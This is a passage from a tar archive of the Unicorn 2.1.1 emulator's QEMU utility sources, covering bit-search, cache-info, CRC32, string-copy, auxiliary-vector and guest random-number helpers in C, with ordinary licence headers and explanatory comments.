        dst++;
        src++;
        nbits -= BITS_PER_LONG;
    }

    if (nbits > BITS_PER_LONG - shift) {
        *dst |= (*src & right_mask) << shift;
        nbits -= BITS_PER_LONG - shift;
        last_mask = ((1ul << nbits) - 1) << (BITS_PER_LONG - shift);
        dst[1] = (*src & last_mask) >> (BITS_PER_LONG - shift);
    } else if (nbits) {
        last_mask = (1ul << nbits) - 1;
        *dst |= (*src & last_mask) << shift;
    }
}

unicorn-2.1.1/qemu/util/bitops.c

/*
 * Copyright (C) 2004 Red Hat, Inc. All Rights Reserved.
 * Written by David Howells (dhowells@redhat.com)
 * Copyright (C) 2008 IBM Corporation
 * Written by Rusty Russell <rusty@rustcorp.com.au>
 * (Inspired by David Howell's find_next_bit implementation)
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version
 * 2 of the License, or (at your option) any later version.
 */

#include "qemu/osdep.h"
#include "qemu/bitops.h"

/*
 * Find the next set bit in a memory region.
 */
unsigned long find_next_bit(const unsigned long *addr, unsigned long size,
                            unsigned long offset)
{
    const unsigned long *p = addr + BIT_WORD(offset);
    unsigned long result = offset & ~(BITS_PER_LONG-1);
    unsigned long tmp;

    if (offset >= size) {
        return size;
    }
    size -= result;
    offset %= BITS_PER_LONG;
    if (offset) {
        tmp = *(p++);
        tmp &= (~0UL << offset);
        if (size < BITS_PER_LONG) {
            goto found_first;
        }
        if (tmp) {
            goto found_middle;
        }
        size -= BITS_PER_LONG;
        result += BITS_PER_LONG;
    }
    while (size >= 4*BITS_PER_LONG) {
        unsigned long d1, d2, d3;
        tmp = *p;
        d1 = *(p+1);
        d2 = *(p+2);
        d3 = *(p+3);
        if (tmp) {
            goto found_middle;
        }
        if (d1 | d2 | d3) {
            break;
        }
        p += 4;
        result += 4*BITS_PER_LONG;
        size -= 4*BITS_PER_LONG;
    }
    while (size >= BITS_PER_LONG) {
        if ((tmp = *(p++))) {
            goto found_middle;
        }
        result += BITS_PER_LONG;
        size -= BITS_PER_LONG;
    }
    if (!size) {
        return result;
    }
    tmp = *p;

found_first:
    tmp &= (~0UL >> (BITS_PER_LONG - size));
    if (tmp == 0UL) {           /* Are any bits set? */
        return result + size;   /* Nope. */
    }
found_middle:
    return result + ctzl(tmp);
}

/*
 * This implementation of find_{first,next}_zero_bit was stolen from
 * Linus' asm-alpha/bitops.h.
 */
unsigned long find_next_zero_bit(const unsigned long *addr, unsigned long size,
                                 unsigned long offset)
{
    const unsigned long *p = addr + BIT_WORD(offset);
    unsigned long result = offset & ~(BITS_PER_LONG-1);
    unsigned long tmp;

    if (offset >= size) {
        return size;
    }
    size -= result;
    offset %= BITS_PER_LONG;
    if (offset) {
        tmp = *(p++);
        tmp |= ~0UL >> (BITS_PER_LONG - offset);
        if (size < BITS_PER_LONG) {
            goto found_first;
        }
        if (~tmp) {
            goto found_middle;
        }
        size -= BITS_PER_LONG;
        result += BITS_PER_LONG;
    }
    while (size & ~(BITS_PER_LONG-1)) {
        if (~(tmp = *(p++))) {
            goto found_middle;
        }
        result += BITS_PER_LONG;
        size -= BITS_PER_LONG;
    }
    if (!size) {
        return result;
    }
    tmp = *p;

found_first:
    tmp |= ~0UL << size;
    if (tmp == ~0UL) {          /* Are any bits zero? */
        return result + size;   /* Nope. */
    }
found_middle:
    return result + ctzl(~tmp);
}

unsigned long find_last_bit(const unsigned long *addr, unsigned long size)
{
    unsigned long words;
    unsigned long tmp;

    /* Start at final word. */
    words = size / BITS_PER_LONG;

    /* Partial final word? */
    if (size & (BITS_PER_LONG-1)) {
        tmp = (addr[words] & (~0UL >> (BITS_PER_LONG
                                       - (size & (BITS_PER_LONG-1)))));
        if (tmp) {
            goto found;
        }
    }
    while (words) {
        tmp = addr[--words];
        if (tmp) {
found:
            return words * BITS_PER_LONG + BITS_PER_LONG - 1 - clzl(tmp);
        }
    }
    /* Not found */
    return size;
}

unicorn-2.1.1/qemu/util/cacheinfo.c

/*
 * cacheinfo.c - helpers to query the host about its caches
 *
 * Copyright (C) 2017, Emilio G. Cota <cota@braap.org>
 * License: GNU GPL, version 2 or later.
 *   See the COPYING file in the top-level directory.
 */

#include "qemu/osdep.h"
#include "qemu/host-utils.h"
#include "qemu/atomic.h"
#include <uc_priv.h>

/*
 * Operating system specific detection mechanisms.
 */
#if defined(_WIN32)

static void sys_cache_info(int *isize, int *dsize)
{
    SYSTEM_LOGICAL_PROCESSOR_INFORMATION *buf;
    DWORD size = 0;
    BOOL success;
    size_t i, n;

    /* Check for the required buffer size first.  Note that if the zero
       size we use for the probe results in success, then there is no
       data available; fail in that case.
*/ success = GetLogicalProcessorInformation(0, &size); if (success || GetLastError() != ERROR_INSUFFICIENT_BUFFER) { return; } n = size / sizeof(SYSTEM_LOGICAL_PROCESSOR_INFORMATION); size = n * sizeof(SYSTEM_LOGICAL_PROCESSOR_INFORMATION); buf = g_new0(SYSTEM_LOGICAL_PROCESSOR_INFORMATION, n); if (!GetLogicalProcessorInformation(buf, &size)) { goto fail; } for (i = 0; i < n; i++) { if (buf[i].Relationship == RelationCache && buf[i].Cache.Level == 1) { switch (buf[i].Cache.Type) { case CacheUnified: *isize = *dsize = buf[i].Cache.LineSize; break; case CacheInstruction: *isize = buf[i].Cache.LineSize; break; case CacheData: *dsize = buf[i].Cache.LineSize; break; default: break; } } } fail: g_free(buf); } #elif defined(__APPLE__) # include <sys/sysctl.h> static void sys_cache_info(int *isize, int *dsize) { /* There's only a single sysctl for both I/D cache line sizes. */ long size; size_t len = sizeof(size); if (!sysctlbyname("hw.cachelinesize", &size, &len, NULL, 0)) { *isize = *dsize = size; } } #elif defined(__FreeBSD__) || defined(__FreeBSD_kernel__) # include <sys/sysctl.h> static void sys_cache_info(int *isize, int *dsize) { /* There's only a single sysctl for both I/D cache line sizes. */ int size; size_t len = sizeof(size); if (!sysctlbyname("machdep.cacheline_size", &size, &len, NULL, 0)) { *isize = *dsize = size; } } #else /* POSIX */ static void sys_cache_info(int *isize, int *dsize) { # ifdef _SC_LEVEL1_ICACHE_LINESIZE int tmp_isize = (int) sysconf(_SC_LEVEL1_ICACHE_LINESIZE); if (tmp_isize > 0) { *isize = tmp_isize; } # endif # ifdef _SC_LEVEL1_DCACHE_LINESIZE int tmp_dsize = (int) sysconf(_SC_LEVEL1_DCACHE_LINESIZE); if (tmp_dsize > 0) { *dsize = tmp_dsize; } # endif } #endif /* sys_cache_info */ /* * Architecture (+ OS) specific detection mechanisms. */ #if defined(__aarch64__) static void arch_cache_info(int *isize, int *dsize) { if (*isize == 0 || *dsize == 0) { uint64_t ctr; /* The real cache geometry is in CCSIDR_EL1/CLIDR_EL1/CSSELR_EL1, but (at least under Linux) these are marked protected by the kernel. However, CTR_EL0 contains the minimum linesize in the entire hierarchy, and is used by userspace cache flushing. */ asm volatile("mrs\t%0, ctr_el0" : "=r"(ctr)); if (*isize == 0) { *isize = 4 << (ctr & 0xf); } if (*dsize == 0) { *dsize = 4 << ((ctr >> 16) & 0xf); } } } #elif defined(_ARCH_PPC) && defined(__linux__) # include "elf.h" static void arch_cache_info(int *isize, int *dsize) { if (*isize == 0) { *isize = qemu_getauxval(AT_ICACHEBSIZE); } if (*dsize == 0) { *dsize = qemu_getauxval(AT_DCACHEBSIZE); } } #else static void arch_cache_info(int *isize, int *dsize) { } #endif /* arch_cache_info */ /* * ... and if all else fails ... */ static void fallback_cache_info(int *isize, int *dsize) { /* If we can only find one of the two, assume they're the same. */ if (*isize) { if (*dsize) { /* Success! */ } else { *dsize = *isize; } } else if (*dsize) { *isize = *dsize; } else { #if defined(_ARCH_PPC) /* For PPC, we're going to use the icache size computed for flush_icache_range. Which means that we must use the architecture minimum. */ *isize = *dsize = 16; #else /* Otherwise, 64 bytes is not uncommon. 
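       (An editorial, hedged note: whatever values are chosen here,
       init_cache_info() below sanity-checks the results with
       assert((isize & (isize - 1)) == 0), i.e. both line sizes must be
       powers of two.)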
 */
        *isize = *dsize = 64;
#endif
    }
}

void init_cache_info(struct uc_struct *uc)
{
    int isize = 0, dsize = 0;

    sys_cache_info(&isize, &dsize);
    arch_cache_info(&isize, &dsize);
    fallback_cache_info(&isize, &dsize);

    assert((isize & (isize - 1)) == 0);
    assert((dsize & (dsize - 1)) == 0);

    uc->qemu_icache_linesize = isize;
}

unicorn-2.1.1/qemu/util/crc32c.c

/*
 * Castagnoli CRC32C Checksum Algorithm
 *
 * Polynomial: 0x11EDC6F41
 *
 * Castagnoli93: Guy Castagnoli and Stefan Braeuer and Martin Herrman
 *               "Optimization of Cyclic Redundancy-Check Codes with 24
 *               and 32 Parity Bits", IEEE Transactions on Communication,
 *               Volume 41, Number 6, June 1993
 *
 * Copyright (c) 2013 Red Hat, Inc.,
 *
 * Authors:
 *  Jeff Cody <jcody@redhat.com>
 *
 * Based on the Linux kernel cryptographic crc32c module,
 *
 * Copyright (c) 2004 Cisco Systems, Inc.
 * Copyright (c) 2008 Herbert Xu <herbert@gondor.apana.org.au>
 *
 * This program is free software; you can redistribute it and/or modify it
 * under the terms of the GNU General Public License as published by the Free
 * Software Foundation; either version 2 of the License, or (at your option)
 * any later version.
* */ #include "qemu/osdep.h" #include "qemu/crc32c.h" /* * This is the CRC-32C table * Generated with: * width = 32 bits * poly = 0x1EDC6F41 * reflect input bytes = true * reflect output bytes = true */ static const uint32_t crc32c_table[256] = { 0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L, 0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL, 0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL, 0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L, 0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL, 0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L, 0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L, 0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL, 0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL, 0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L, 0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L, 0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL, 0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L, 0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL, 0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL, 0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L, 0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L, 0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L, 0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L, 0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L, 0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L, 0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L, 0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L, 0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L, 0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L, 0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L, 0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L, 0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L, 0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L, 0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L, 0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L, 0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L, 0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL, 0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L, 0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L, 0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL, 0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L, 0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL, 0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL, 0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L, 0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L, 0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL, 0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL, 0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L, 0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL, 0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L, 0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L, 0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL, 0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L, 0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL, 0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL, 0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L, 0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL, 0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L, 0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L, 0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL, 0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL, 0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L, 0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L, 0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL, 0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L, 0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL, 0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL, 0xBE2DA0A5L, 0x4C4623A6L, 
0x5F16D052L, 0xAD7D5351L }; uint32_t crc32c(uint32_t crc, const uint8_t *data, unsigned int length) { while (length--) { crc = crc32c_table[(crc ^ *data++) & 0xFFL] ^ (crc >> 8); } return crc^0xffffffff; } /* * This is the CRC-32 table * Generated with: * width = 32 bits * poly = 0xEDB88320 */ static const uint32_t crc32_table[256] = { 0x00000000U, 0x77073096U, 0xEE0E612CU, 0x990951BAU, 0x076DC419U, 0x706AF48FU, 0xE963A535U, 0x9E6495A3U, 0x0EDB8832U, 0x79DCB8A4U, 0xE0D5E91EU, 0x97D2D988U, 0x09B64C2BU, 0x7EB17CBDU, 0xE7B82D07U, 0x90BF1D91U, 0x1DB71064U, 0x6AB020F2U, 0xF3B97148U, 0x84BE41DEU, 0x1ADAD47DU, 0x6DDDE4EBU, 0xF4D4B551U, 0x83D385C7U, 0x136C9856U, 0x646BA8C0U, 0xFD62F97AU, 0x8A65C9ECU, 0x14015C4FU, 0x63066CD9U, 0xFA0F3D63U, 0x8D080DF5U, 0x3B6E20C8U, 0x4C69105EU, 0xD56041E4U, 0xA2677172U, 0x3C03E4D1U, 0x4B04D447U, 0xD20D85FDU, 0xA50AB56BU, 0x35B5A8FAU, 0x42B2986CU, 0xDBBBC9D6U, 0xACBCF940U, 0x32D86CE3U, 0x45DF5C75U, 0xDCD60DCFU, 0xABD13D59U, 0x26D930ACU, 0x51DE003AU, 0xC8D75180U, 0xBFD06116U, 0x21B4F4B5U, 0x56B3C423U, 0xCFBA9599U, 0xB8BDA50FU, 0x2802B89EU, 0x5F058808U, 0xC60CD9B2U, 0xB10BE924U, 0x2F6F7C87U, 0x58684C11U, 0xC1611DABU, 0xB6662D3DU, 0x76DC4190U, 0x01DB7106U, 0x98D220BCU, 0xEFD5102AU, 0x71B18589U, 0x06B6B51FU, 0x9FBFE4A5U, 0xE8B8D433U, 0x7807C9A2U, 0x0F00F934U, 0x9609A88EU, 0xE10E9818U, 0x7F6A0DBBU, 0x086D3D2DU, 0x91646C97U, 0xE6635C01U, 0x6B6B51F4U, 0x1C6C6162U, 0x856530D8U, 0xF262004EU, 0x6C0695EDU, 0x1B01A57BU, 0x8208F4C1U, 0xF50FC457U, 0x65B0D9C6U, 0x12B7E950U, 0x8BBEB8EAU, 0xFCB9887CU, 0x62DD1DDFU, 0x15DA2D49U, 0x8CD37CF3U, 0xFBD44C65U, 0x4DB26158U, 0x3AB551CEU, 0xA3BC0074U, 0xD4BB30E2U, 0x4ADFA541U, 0x3DD895D7U, 0xA4D1C46DU, 0xD3D6F4FBU, 0x4369E96AU, 0x346ED9FCU, 0xAD678846U, 0xDA60B8D0U, 0x44042D73U, 0x33031DE5U, 0xAA0A4C5FU, 0xDD0D7CC9U, 0x5005713CU, 0x270241AAU, 0xBE0B1010U, 0xC90C2086U, 0x5768B525U, 0x206F85B3U, 0xB966D409U, 0xCE61E49FU, 0x5EDEF90EU, 0x29D9C998U, 0xB0D09822U, 0xC7D7A8B4U, 0x59B33D17U, 0x2EB40D81U, 0xB7BD5C3BU, 0xC0BA6CADU, 0xEDB88320U, 0x9ABFB3B6U, 0x03B6E20CU, 0x74B1D29AU, 0xEAD54739U, 0x9DD277AFU, 0x04DB2615U, 0x73DC1683U, 0xE3630B12U, 0x94643B84U, 0x0D6D6A3EU, 0x7A6A5AA8U, 0xE40ECF0BU, 0x9309FF9DU, 0x0A00AE27U, 0x7D079EB1U, 0xF00F9344U, 0x8708A3D2U, 0x1E01F268U, 0x6906C2FEU, 0xF762575DU, 0x806567CBU, 0x196C3671U, 0x6E6B06E7U, 0xFED41B76U, 0x89D32BE0U, 0x10DA7A5AU, 0x67DD4ACCU, 0xF9B9DF6FU, 0x8EBEEFF9U, 0x17B7BE43U, 0x60B08ED5U, 0xD6D6A3E8U, 0xA1D1937EU, 0x38D8C2C4U, 0x4FDFF252U, 0xD1BB67F1U, 0xA6BC5767U, 0x3FB506DDU, 0x48B2364BU, 0xD80D2BDAU, 0xAF0A1B4CU, 0x36034AF6U, 0x41047A60U, 0xDF60EFC3U, 0xA867DF55U, 0x316E8EEFU, 0x4669BE79U, 0xCB61B38CU, 0xBC66831AU, 0x256FD2A0U, 0x5268E236U, 0xCC0C7795U, 0xBB0B4703U, 0x220216B9U, 0x5505262FU, 0xC5BA3BBEU, 0xB2BD0B28U, 0x2BB45A92U, 0x5CB36A04U, 0xC2D7FFA7U, 0xB5D0CF31U, 0x2CD99E8BU, 0x5BDEAE1DU, 0x9B64C2B0U, 0xEC63F226U, 0x756AA39CU, 0x026D930AU, 0x9C0906A9U, 0xEB0E363FU, 0x72076785U, 0x05005713U, 0x95BF4A82U, 0xE2B87A14U, 0x7BB12BAEU, 0x0CB61B38U, 0x92D28E9BU, 0xE5D5BE0DU, 0x7CDCEFB7U, 0x0BDBDF21U, 0x86D3D2D4U, 0xF1D4E242U, 0x68DDB3F8U, 0x1FDA836EU, 0x81BE16CDU, 0xF6B9265BU, 0x6FB077E1U, 0x18B74777U, 0x88085AE6U, 0xFF0F6A70U, 0x66063BCAU, 0x11010B5CU, 0x8F659EFFU, 0xF862AE69U, 0x616BFFD3U, 0x166CCF45U, 0xA00AE278U, 0xD70DD2EEU, 0x4E048354U, 0x3903B3C2U, 0xA7672661U, 0xD06016F7U, 0x4969474DU, 0x3E6E77DBU, 0xAED16A4AU, 0xD9D65ADCU, 0x40DF0B66U, 0x37D83BF0U, 0xA9BCAE53U, 0xDEBB9EC5U, 0x47B2CF7FU, 0x30B5FFE9U, 0xBDBDF21CU, 0xCABAC28AU, 0x53B39330U, 0x24B4A3A6U, 0xBAD03605U, 0xCDD70693U, 0x54DE5729U, 
0x23D967BFU, 0xB3667A2EU, 0xC4614AB8U, 0x5D681B02U, 0x2A6F2B94U, 0xB40BBE37U, 0xC30C8EA1U, 0x5A05DF1BU, 0x2D02EF8DU, }; uint32_t crc32(uint32_t crc, const uint8_t *data, unsigned int length) { int i; crc = ~crc; for (i = 0; i < length; i++) { crc = (crc >> 8) ^ crc32_table[(crc ^ data[i]) & 0xff]; } return ~crc; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/cutils.c��������������������������������������������������������������������0000664�0000000�0000000�00000003243�14675241067�0016601�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Simple C functions to supplement the C library * * Copyright (c) 2006 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include <string.h> #include "qemu/cutils.h" void pstrcpy(char *buf, int buf_size, const char *str) { int c; char *q = buf; if (buf_size <= 0) return; for(;;) { c = *str++; if (c == 0 || q >= buf + buf_size - 1) break; *q++ = c; } *q = '\0'; } /* strcat and truncate. 
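   A hedged usage sketch of the cutils pair (the buffer name is
   illustrative only):

       char buf[8];
       pstrcpy(buf, sizeof(buf), "hello");
       pstrcat(buf, sizeof(buf), ", world");

   leaves buf holding "hello, ": both helpers refuse to write past
   buf_size and always NUL-terminate, unlike strncpy()/strncat().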
*/ char *pstrcat(char *buf, int buf_size, const char *s) { int len; len = strlen(buf); if (len < buf_size) pstrcpy(buf + len, buf_size - len, s); return buf; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/getauxval.c�����������������������������������������������������������������0000664�0000000�0000000�00000006200�14675241067�0017272�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU access to the auxiliary vector * * Copyright (C) 2013 Red Hat, Inc * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #ifdef CONFIG_GETAUXVAL /* Don't inline this in qemu/osdep.h, because pulling in <sys/auxv.h> for the system declaration of getauxval pulls in the system <elf.h>, which conflicts with qemu's version. */ #include <sys/auxv.h> unsigned long qemu_getauxval(unsigned long key) { return getauxval(key); } #elif defined(__linux__) #include "elf.h" /* Our elf.h doesn't contain Elf32_auxv_t and Elf64_auxv_t, which is ok because that just makes it easier to define it properly for the host here. */ typedef struct { unsigned long a_type; unsigned long a_val; } ElfW_auxv_t; static const ElfW_auxv_t *auxv; static const ElfW_auxv_t *qemu_init_auxval(void) { ElfW_auxv_t *a; ssize_t size = 512, r, ofs; int fd; /* Allocate some initial storage. Make sure the first entry is set to end-of-list, so that we've got a valid list in case of error. */ auxv = a = g_malloc(size); a[0].a_type = 0; a[0].a_val = 0; fd = open("/proc/self/auxv", O_RDONLY); if (fd < 0) { return a; } /* Read the first SIZE bytes. Hopefully, this covers everything. */ r = read(fd, a, size); if (r == size) { /* Continue to expand until we do get a partial read. 
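   Worked through with the numbers above: if the initial 512-byte read
   fills the buffer completely, ofs becomes 512, the buffer grows to
   1024, and the next read() asks for another 512 bytes at offset 512;
   the loop ends on the first short read (r < ofs), which marks the end
   of the auxiliary vector.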
*/ do { ofs = size; size *= 2; auxv = a = g_realloc(a, size); r = read(fd, (char *)a + ofs, ofs); } while (r == ofs); } close(fd); return a; } unsigned long qemu_getauxval(unsigned long type) { const ElfW_auxv_t *a = auxv; if (unlikely(a == NULL)) { a = qemu_init_auxval(); } for (; a->a_type != 0; a++) { if (a->a_type == type) { return a->a_val; } } return 0; } #elif defined(__FreeBSD__) #include <sys/auxv.h> unsigned long qemu_getauxval(unsigned long type) { unsigned long aux = 0; elf_aux_info(type, &aux, sizeof(aux)); return aux; } #else unsigned long qemu_getauxval(unsigned long type) { return 0; } #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/guest-random.c��������������������������������������������������������������0000664�0000000�0000000�00000003433�14675241067�0017704�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU guest-visible random functions * * Copyright 2019 Linaro, Ltd. * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the Free * Software Foundation; either version 2 of the License, or (at your option) * any later version. */ #include "qemu/osdep.h" #include "qemu/cutils.h" //#include "qapi/error.h" #include "qemu/guest-random.h" #include "crypto/random.h" //#include "sysemu/replay.h" #ifndef _MSC_VER static __thread GRand *thread_rand; #endif static bool deterministic = true; static int glib_random_bytes(void *buf, size_t len) { #ifndef _MSC_VER GRand *rand = thread_rand; size_t i; uint32_t x; if (unlikely(rand == NULL)) { /* Thread not initialized for a cpu, or main w/o -seed. 
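       Lazily create a per-thread generator instead: g_rand_new() seeds
       itself (from /dev/urandom where available, otherwise the current
       time), so threads that were never explicitly seeded still get
       independent streams.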
 */
        thread_rand = rand = g_rand_new();
    }

    for (i = 0; i + 4 <= len; i += 4) {
        x = g_rand_int(rand);
        __builtin_memcpy(buf + i, &x, 4);
    }
    if (i < len) {
        x = g_rand_int(rand);
        /* Copy only the remaining tail bytes: len - i, not i - len,
           which would underflow size_t and overrun the buffer. */
        __builtin_memcpy(buf + i, &x, len - i);
    }
#endif
    return 0;
}

int qemu_guest_getrandom(void *buf, size_t len)
{
    return glib_random_bytes(buf, len);
}

void qemu_guest_getrandom_nofail(void *buf, size_t len)
{
    (void)qemu_guest_getrandom(buf, len);
}

uint64_t qemu_guest_random_seed_thread_part1(void)
{
    if (deterministic) {
        uint64_t ret;
        glib_random_bytes(&ret, sizeof(ret));
        return ret;
    }
    return 0;
}

void qemu_guest_random_seed_thread_part2(uint64_t seed)
{
#ifndef _MSC_VER
    g_assert(thread_rand == NULL);
    if (deterministic) {
        thread_rand =
            g_rand_new_with_seed_array((const guint32 *)&seed,
                                       sizeof(seed) / sizeof(guint32));
    }
#endif
}

unicorn-2.1.1/qemu/util/host-utils.c

/*
 * Utility compute operations used by translated code.
 *
 * Copyright (c) 2003 Fabrice Bellard
 * Copyright (c) 2007 Aurelien Jarno
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
